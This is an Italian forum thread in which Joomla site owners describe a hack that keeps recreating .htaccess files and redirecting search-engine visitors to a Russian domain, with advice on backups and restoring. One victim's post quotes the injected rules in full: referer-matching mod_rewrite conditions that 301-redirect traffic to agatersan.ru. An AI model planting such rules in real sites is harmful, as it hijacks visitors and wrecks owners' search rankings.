Autore Topic: sito hackerato- conseguenze relative su indicizzazione Google  (Letto 5513 volte)

Offline cambodia #1

  • Nuovo arrivato
  • *
  • Post: 45
    • Mostra profilo
salve,
per combinazione tragica della sorte, proprio mentre mi trovavo in un letto di ospedale con un attacco ischemico al cuore e smanettavo con lo smartphone di mia moglie, ho notato che aprendo il mio sito ( cambogia-viaggi-avventure.com) la connessione veniva indirizzata su un sito russo.

Premetto che ho la versione di Joomla 1.5.25 aggiornata e dispongo di RS Firewall che al momento era in modalitá LOCKDOWN.

Invio subito un messaggio all'hosting server, il quale mi dice che un hacker ha exploitato un file obsoleto di un componente non aggiornato ( ed io che pensavo di avere tutto aggiornato !!!) e in pratica mi ha detto di arrangiarmi.
Ho effettuato dei backup periodici con akeeba, che pero' tenevo disgraziatamente sul server.
Sono stato veramente un demente a non dedicare piú tempo alla sicurezza del sito.

Ma veniamo ai danni.

Adesso mi si creano da soli dei file .htaccess, i links del mio sito presenti su Google vanno sul sito russo in questione e non solo, il sito non si apre se non premetto www al dominio, mandandomi in malora tutta l'indicizzazione sui motori di ricerca .

In pratica se digito sul browser il dominio del sito senza www, il sito non si apre. Se clicco su un link al mio sito presente su Google (in genere  cambogia-viaggi-avventure.com/etc , senza www) la connessione va al sito russo.

Io sono un SEO/SEM abbastanza valido ( non sono un web developer professionista, sono un volontario in un progetto di educazione professionale in Cambogia), mi intendo relativamente poco di programmazione, di scripts e balle varie, ma so come fare andare in prima pagina un sito per ogni keyword relativa in tre mesi. Ho speso giornate intere di lavoro per portare il mio sito sulle prime pagine di Google relativamente a 4 keywords essenziali, ed adesso e' tutto da rifare.... Alle volte mi viene voglia di mandare a quel paese Joomla, che fino ad ora ho ritenuto la piu'valida piattaforma per il web-developing moderno.
Lo so che il sito é compromesso, e che devo rifarlo.
Devo almeno togliere l'inconveniente del www. Che devo fare? Una soluzione temporanea per non farmi perdere la posizione su Google. Non mi interessa se il sito rimane compromesso. Ho intenzione di ricostruire il sito ex-novo su altro server. A proposito, sapete indicarmene uno sicuro e con servizio utenti 24h? ( sempre che possiate, so che su questo forum sono proibiti riferimenti commerciali)

Grazie in anticipo per la collaborazione.

p.

Sihanoukville - Cambogia
« Ultima modifica: 04 Mar 2012, 01:14:01 da cambodia #1 »

mau_develop

  • Visitatore
Re:sito hackerato- conseguenze relative su indicizzazione Google
« Risposta #1 il: 02 Mar 2012, 10:28:23 »
beh .. si denota la disperazione e il tentativo di dividere le responsabilità.... purtroppo in maggior parte tue.
Se tu avessi avuto un backup che si fa in due minuti adesso non saresti in qs condizioni.
Inoltre se tu avessi tenuto aggiornato le estensioni probabilmente non avrebbero bucato il sito.
Per quanto riguarda le critiche a Joomla... beh avresti gli stessi problemi con qualunque cosa tu usi se non la mantieni.
L'indicizzazione ritorna a posto quando metti a posto, al max devi chiedere a google di essere riconsiderato... ma credo che di qs cose ne sai più tu di me.
Per sistemare puoi leggere il post in testa a qs sezione; scegli una strada... penna e matita per appunti... una camomilla ... e se hai bisogno il forum è quì.
M

Offline cambodia #1

  • Nuovo arrivato
  • *
  • Post: 45
    • Mostra profilo
Re:sito hackerato- conseguenze relative su indicizzazione Google
« Risposta #2 il: 04 Mar 2012, 01:06:34 »
beh, grazie della risposta. Devo fare una aggiunta a quello che definisci le mie "critiche a Joomla".

Uso Joomla dal 2006 ed ho sviluppato circa una ventina di siti con tale sistema. Joomla é stato creato come piattaforma "user friendly" (ed a prova di stupido) per facilitare l' accesso di contenuto su internet ; in breve, chi voleva avere un sito vero e proprio dove pubblicare il proprio content senza ricorrere a  piattaforme come blogger. com etc., poteva farlo facilmente con Joomla, anche senza conoscere HTML, PhP, CSS e amenitá del genere.
L'avere un proprio sito professionalmente sviluppato, con tanto di sistemi integrati per il SEO e centinaia di app e componenti gratis, senza essere "del mestiere", rappresentó all'epoca una rivoluzione.

Il poter editare il proprio sito senza rivolgersi al web-developer di fiducia ( e relative spese) bensí usando un comunissimo word editor, ed il poterlo fare da qualsiasi pc collegato ad Internet, rappresentó la novitá fondamentale, la chiave di volta.

Nascevano i CMS, finalmente, ed Joomla era ( ed e' tuttora, per certi versi) il migliore.

Un salumiere, un elettrauto o un insegnante come il sottoscritto potevano costruirsi ( e mantenersi) il proprio sito internet in poche ore! E soprattutto, basta con Dreamweaver e Frontpage, due incubi alla Stephen King che noi vecchiotti ci siamo dovuto sobbarcare per anni.

Adesso sembra che invece Joomla sia diventato un giocattolo per adepti e maghi dello script. Guardate i moderni templates di ultima generazione, creati per Joomla: ci vuole uno studio di web-design per usarne uno! Provate JoomlaBamboo:ti dicono che devi utilizzare vari frames, Zen grid etc etc., cose astruse e difficili per i non esperti e peraltro non disponibili, per la maggior parte, in lingua Italiana. Io per forza di cose, parlo e capisco perfettamente l'inglese, vivendo all'estero da 32 anni, ma i comuni mortali? Ed anche la sicurezza, ahimé, é diventata appannaggio di pochi esperti, a giudicare dalla mole di posts sui vari forum Joomla che seguo un po'in giro per il mondo, che lamentano siti hackerati e difficoltá a ripristinarli.
Anche avere un backup, dicono gli stessi sviluppatori di Akeeba e componenti simili, non garantisce al 100 per cento il perfetto ripristino di un sito compromesso. Lo dicono persino i miei host ( che non cito ). Ammenoché, dicono, non si sia sicuri di quello che si fa, ossia veramente ferrati in Joomla ed i suoi sistemi e sottosistemi, e con il PhP, con Apache e balle varie.

Per farla breve, usare Joomla e'diventato una professione. E i developers sono sempre piú restii a farti partecipe delle loro conoscenze. Joomla non é piú la rivoluzione popolar-populista del web, Joomla e' diventato come i nostri politici quando poggiano il deretano sulle poltrone di Roma. Una elíte.

Avro' torto, ma vorrei che gli utenti dicessero la loro sull'argomento. Sentire il parere degli utenti giova agli sviluppatori dell'Open Source. "Cum tacent, clamant." ( Cicerone)

Comunque grazie ancora per il tuo intervento, che almeno a me non é servito a molto ( tranne il consiglio della camomilla, anche se in questi giorni a me servirebbe qualcosa di piú potente)...

Sempre meglio, comunque, del forum di Joomla.org, dove addirittura NON PUOI POSTARE DIRETTAMENTE scrivendo che ti hanno hackerato il sito, ma devi usare una sorta di form....descrivendo persino il tipo di attacco subíto...si, come se tutti, un bel mattino, vedendosi il sito hackerato, riescano a riconoscere il tipo di exploit....   ;D ;D ;D ;D AHAHAHAHAH !

Saluti dalla Cambogia, Mau
« Ultima modifica: 04 Mar 2012, 02:41:18 da cambodia #1 »

mau_develop

  • Visitatore
Re:sito hackerato- conseguenze relative su indicizzazione Google
« Risposta #3 il: 04 Mar 2012, 10:48:06 »
Allora... innanzitutto un barile di invidia per dove ti trovi....poi
tutto il primo pezzo descrittivo di cosa è J lo condivido, ma quì inizi a mischiare un po..
Citazione
Il poter editare il proprio sito senza rivolgersi al web-developer di fiducia ( e relative spese) bensí usando un comunissimo word editor, ed il poterlo fare da qualsiasi pc collegato ad Internet, rappresentó la novitá fondamentale, la chiave di volta.
Sottolineo la parola EDITARE (scusa il maiuscolo è solo per evidenziare)... non sviluppare (ma io dico anche mantenere)

Citazione
Un salumiere, un elettrauto o un insegnante come il sottoscritto potevano costruirsi ( e mantenersi) il proprio sito internet in poche ore!
costruirsi ( e mantenersi)
è diversa perchè servono competenze diverse che in parte se le sono accollate gli hoster pur di avere clienti (backup automatici, pacchetti preinstallati etc) ...ma non possono mantenere i siti o vedere se hai aggiornato le estensioni.

Citazione
Adesso sembra che invece Joomla sia diventato un giocattolo per adepti e maghi dello script. Guardate i moderni templates di ultima generazione, creati per Joomla: ci vuole uno studio di web-design per usarne uno! Provate JoomlaBamboo:ti dicono che devi utilizzare vari frames, Zen grid etc etc., cose astruse e difficili per i non esperti e peraltro non disponibili, per la maggior parte, in lingua Italiana.
è lo stesso discorso di cui sopra... se vuoi usare joomla "pacchetto base" non hai il minimo problema, gestisci tutto, e finita lì... il problema è che si vuole il forum, la chat, compatibilità smartphone ... e a volte senza nemmeno sapere cosa c'è dietro, che tecnologia, che possibilità... è di moda e lo voglio... inoltre spesso si confonde tutto questo con joomla....

E' sfuggito a tutti che J vuole essere e puntare ad essere un framework per lo sviluppo di web platform il fatto che fornisca tutto già con un aspetto è semplicemente una comodità che vuole continuare ad offrire anche agli user meno esperti... se ci fai caso, visto che lo usi da anni, nel corso del tempo si è liberato di tutte le librerie esterne, vedi pdf, adodb ...
e anche dei template non si occupa delegandoli a collaboratori ormai consolidati.

Citazione
Ed anche la sicurezza, ahimé, é diventata appannaggio di pochi esperti,
ASSOLUTAMENTE NO. Pensa che basta un backup frequente e ti possono pure fare il danno più grande che tu possa immaginare che non te ne frega nulla e non apri nessun post da nessuna parte.
Sono sempre stato contrario ai tool di backup sostanzialmente per due motivi:
1) è assurdo usare un tool perchè di default hai già il più bello "phpmyadmin"
2) un tool ti impedisce di fare amicizia con il tuo db... quel coso sconosiuto e misterioso che ti accorgi esiste solo quando lo devi pagare o te lo bucano.... e pensare che tutti i tuoi gioielli sono lì!
Poi solitamente si passa dalle estensioni per bucare J... non è colpa di J se lasci falle in ciò che scrivi... loro non controllano certo le estensioni...

quanto detto lo dimostra questo:
Citazione
Anche avere un backup, dicono gli stessi sviluppatori di Akeeba e componenti simili, non garantisce al 100 per cento il perfetto ripristino di un sito compromesso. Lo dicono persino i miei host ( che non cito ). Ammenoché, dicono, non si sia sicuri di quello che si fa,
guarda ... mi sbilancio... io mi sentirei invece di garantirti tutto ciò che loro non garantiscono se usi phpmyadmin... e non occorre conoscere nulla di ciò che dicono... bisogna solo capire magari studiando qualcosina in + (cos'è un db, come lavora... senza entrare poi nello scientifico)

Citazione
Per farla breve, usare Joomla e'diventato una professione.
...magari fosse così... sarei ricco e accanto a te con la canna da pesca o a volare con la mia vela

Citazione
E i developers sono sempre piú restii a farti partecipe delle loro conoscenze.
è un equivoco... le cose si complicano e fare la solita domanda "come faccio a..." può essere complicato da spiegare in un post. Tieni conto che queste domande molte volte sono fatte da comuni users che pretendono di modificare il codice senza avere la minima cognizione di ciò che fanno

Citazione
Joomla non é piú la rivoluzione popolar-populista del web, Joomla e' diventato come i nostri politici quando poggiano il deretano sulle poltrone di Roma. Una elíte.
:) dimentichi che ti ritrovi un Monti che nessuno ha mai voluto e che ti piaccia o no lo paghi, J prima di tutto è gratis e poi è democratico poichè difficilmente il tuo hoster o chicchessia ti obbligherà all'uso di J... c'è drupal...wp, simple, e mille altri
Esempi democratici cambogiani... scusa ma nn me ne vengono in mente :):)

Citazione
Avro' torto,
... hai un opinione....

Citazione
Sempre meglio, comunque, del forum di Joomla.org
.......... lascia perdere... il mio account lì è durato un'oretta... il tempo di spiegargli un bel exploit sulla pw che non hanno nemmeno capito ... deridendomi e definendomi un kiddie (... 48 anni!)...
... ecco, lì sì che chi sviluppa è un po' "chiuso" ma ti assicuro che Amy ha un suo blog e scrive su parecchi siti e se gli chiedi qualcosa è gentile e ti risponde... più di una sua opinione....

M.
« Ultima modifica: 04 Mar 2012, 10:56:38 da mau_develop »

Offline cambodia #1

  • Nuovo arrivato
  • *
  • Post: 45
    • Mostra profilo
Re:sito hackerato- conseguenze relative su indicizzazione Google
« Risposta #4 il: 04 Mar 2012, 11:18:11 »
beh, perlomeno siamo coetanei ( 48 anni).  ;D

Non entro nel merito della tua risposta, la vediamo da due punti di vista differenti, tu da developer, io da utente. Io ho cominciato ad usare J perché mi faceva risparmiare tempo rispetto al Dreamweaver, con il vantaggio delle centinaia di componenti "ad hoc", alcuni sviluppati veramente ad opera d'arte.

Tutto qui. E continueró ad usare J, e terró aggiornato tutto, stanne pur certo. A proposito, mi daresti l'URL del blog di Amy? Grazie ;)

Quando vuoi farti una vacanza a costi ridicolmente bassi su un isola semideserta ricoperta da una giungla fittissima, dove non esistono strade, dove non c'e' la corrente elettrica né acqua corrente, Internet arriva a stento tramite 3G e lo stress é un concetto sconosciuto, la mia modesta casetta di legno sul pontile di un villaggio di 80 anime ( tutti pescatori semi-analfabeti) é a tua disposizione.

I rumori ed i colori della giungla vicino casa e la barriera corallina a 70 metri , la gente che aiuto quotidianamente, per fortuna, contano piú di Joomla, di Monti e di tutto il resto, alla fine.

Potrei avere bisogno del tuo aiuto in questi giorni, sempre che tu voglia aiutare un brocco come me.....dispongo di un backup ottenuto con Akeeba, domani mi studieró come effettuare il restore e cercheró di risistemare il mio sito.

Il sito fa parte di un progetto di volontariato di cui sono uno dei promotori, assieme ai Salesiani e pochi altri italiani residenti: una piccola scuola alberghiera per aiutare i giovani abitanti delle isole ad avere un futuro migliore. Un pezzo di buona volontá italiana in mezzo al nulla. Non sono certo ricco (sono anche invalido e pure senza pensione), e l'unica fonte di sostentamento per il progetto in corso sono i (pochi) turisti italiani che vengono a visitare le isole ancora vergini della costa cambogiana proprio grazie al mio sito, costruito pezzo per pezzo in due anni, quando possibile, con connessioni Internet lente come da noi  nel 1995 e decine di altri inconvenienti.

saluti da Koh Rong Samleum

p.
« Ultima modifica: 04 Mar 2012, 11:45:45 da cambodia #1 »

mau_develop

  • Visitatore
Re:sito hackerato- conseguenze relative su indicizzazione Google
« Risposta #5 il: 04 Mar 2012, 11:41:52 »
Citazione
I rumori ed i colori della giungla vicino casa e la barriera corallina a 70 metri , per fortuna, contano piú di Joomla, di Monti e di tutto il resto, alla fine.
Citazione
Il sito fa parte di un progetto di volontariato di cui sono uno dei promotori, assieme ai Salesiani e pochi altri italiani residenti: una piccola scuola alberghiera per aiutare i giovani abitanti delle isole ad avere un futuro migliore.
... se hai problemi sono quì, vediamo di rimettere tutto a posto, l'importante in questi casi è non pasticciare poichè poi si verificano cose inaspettate e difficilmente risolvibili a posteriori.
Ma akeba backuppa anche i files?

... ho gratitudine da rendere ai Salesiani, quasi tutto ciò che so della programmazione mi è stato insegnato a costo 0 da un ragazzo salesiano veramente in gamba... molti anni fa....

M.

...aggià ...il link... scusa per il rinvio a google ma è molto più completo così
http://www.google.com/search?q=amy+stephen
la prima pagina e un pezzo della seconda sono sue, dei suoi profili e dei suoi account  :):):)
tieni anche conto che per J è un riferimento mondiale quindi data la mole di mail e post a cui rispondere difficilmente lo farà se gli chiedi come modificare il template, per quello ci sono i forum.

Citazione
Il sito fa parte di un progetto di volontariato di cui sono uno dei promotori, assieme ai Salesiani e pochi altri italiani residenti: una piccola scuola alberghiera per aiutare i giovani abitanti delle isole ad avere un futuro migliore. Un pezzo di buona volontá italiana in mezzo al nulla. Non sono certo ricco (sono anche invalido e pure senza pensione), e l'unica fonte di sostentamento per il progetto in corso sono i (pochi) turisti italiani che vengono a visitare le isole ancora vergini della costa cambogiana proprio grazie al mio sito, costruito pezzo per pezzo in due anni, quando possibile, con connessioni Internet lente come da noi  nel 1995 e decine di altri inconvenienti.
magari prova a fare un annuncio se qualcuno che ha siti che trattano di viaggi ti da una mano tirandoti un po' su nelle serp, il mio sito non ha grande frequentazione altrimenti ti aiuterei io...
« Ultima modifica: 04 Mar 2012, 12:07:26 da mau_develop »

Offline cambodia #1

  • Nuovo arrivato
  • *
  • Post: 45
    • Mostra profilo
Re:sito hackerato- conseguenze relative su indicizzazione Google
« Risposta #6 il: 09 Mar 2012, 04:27:33 »
Ciao M.

dopo un paio di giorni di riposo ( sono malato di cuore) mi sono rimesso al lavoro per sistemare 'sto cavolo di sito.

Prima di provedere con il restore del backup ottenuto con Akeeba ( spero che tu mi aiuterai) che intendo effettuare tra un paio di giorni, sto provvedendo al controllo ed all'aggiornamento dei componenti, plugin e ammennicoli vari, ( ho preso, come hai detto tu, carta e penna e sto annotando tutto cio'che ho istallato nel corso di circa due anni di gestione del sito ) e sto scaricando ( ad una velocitá "stratosferica" di circa 68 kbps ed interruzioni durante qualche temporale o vento forte) tutte le immagini contenute nel mio sito ( migliaia) per passarle poi al Kaspersky una volta scaricate tutte.

Ora, chi mi ha hackerato il sito mi ha piazzato qualche comando che crea dei files .HTACCESS che mi reindirizzano i links presenti su Google ( che sono senza il prefisso www) su siti russi.

A proposito-breve parentesi- ho ricevuto una strana e-mail contenente caratteri in cirillico con cui mi chiedevano quanto volevo per la eventuale vedita del dominio...

Ebbene, quando io eliminavo questi due files .HTACCESS il sito mi si rimetteva a posto , ovvero l'utente poteva andare sul sito direttamente dal link presente su Google. Dopo qualche minuto questi files si ricreano da soli. Secondo te come posso fare per renderli inoffensivi almeno fino a quando non faro'il restore? E se il restore non dovesse funzionare sono pronto a rifare tutto il sito da zero. Sto salvando anche i testi, la cosa piú rognosa , vista la velocitá di connessione qui su questa isola della malora...

Ti ringrazio anticipatamente per tutto l'aiuto che mi puoi dare.

Ciao

P.
« Ultima modifica: 09 Mar 2012, 04:42:23 da cambodia #1 »

Offline cambodia #1

  • Nuovo arrivato
  • *
  • Post: 45
    • Mostra profilo
Re:sito hackerato- conseguenze relative su indicizzazione Google
« Risposta #7 il: 13 Mar 2012, 04:33:38 »
Ciao , sono ancora io che ti disturbo...

e'arrivato il momento fatidico, dopo aver salvato tutti i testi ed immagini ( non si sa mai) mi sto accingendo a provare l'ultima carta, il restore di un backup ottenuto con Akeeba. Ho scaricato anche Kickstart, che dovrebbe servire a fare il restore del file ( che e'in estensione JPA). Dispongo inoltre di un file backup, ( .tar) che dovrebbe essere il backup del database. Come devo procedere? Devo fare anche un backup delle tabelle del db su PhpAdmin per maggiore sicurezza?

Grazie per tutto l'aiuto che mi potrai dare.

mau_develop

  • Visitatore
Re:sito hackerato- conseguenze relative su indicizzazione Google
« Risposta #8 il: 13 Mar 2012, 10:28:21 »
Ora, chi mi ha hackerato il sito mi ha piazzato qualche comando che crea dei files .HTACCESS che mi reindirizzano i links presenti su Google ( che sono senza il prefisso www) su siti russi.
---------------------------------------------------------------------------------------------------

scusa ma ho bisogno di capire alcune cose, magari le hai dette ma me le sono perse tra i post:
- indirizzo del sito
- tipo di hosting: virtuale, server managed, dedicato ...
- versione joomla installata
- estensioni aggiunte oltre all'installazione base del pacchetto joomla.

M.

Offline fotovideoplay

  • Nuovo arrivato
  • *
  • Post: 41
  • Sesso: Maschio
    • Mostra profilo
Re:sito hackerato- conseguenze relative su indicizzazione Google
« Risposta #9 il: 28 Apr 2012, 15:43:04 »
Scusa mi è capitta la stessa cosa , mi crea questo file .htaccess e dopo che lo modifico.. zack ! in un attimo me lo ricrea.. così:
Codice: [Seleziona]
<IfModule mod_rewrite.c>                                                                                                               

RewriteEngine On                                                                                                                       

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)                                                                                                                       

RewriteRule ^(.*)$ http://agatersan.ru/easy?9 [R=301,L]                                                                                                                       

RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)                                                                                                                       

RewriteRule ^(.*)$ http://agatersan.ru/easy?9 [R=301,L]                                                                                                                       

</IfModule>
Come hai risolto se hai risolto?
“Io divento vecchio imparando sempre molte cose.”
 Foto Video Play snc


mau_develop

  • Visitatore
« Ultima modifica: 28 Apr 2012, 19:46:29 da mau_develop »

 

Host

Torna su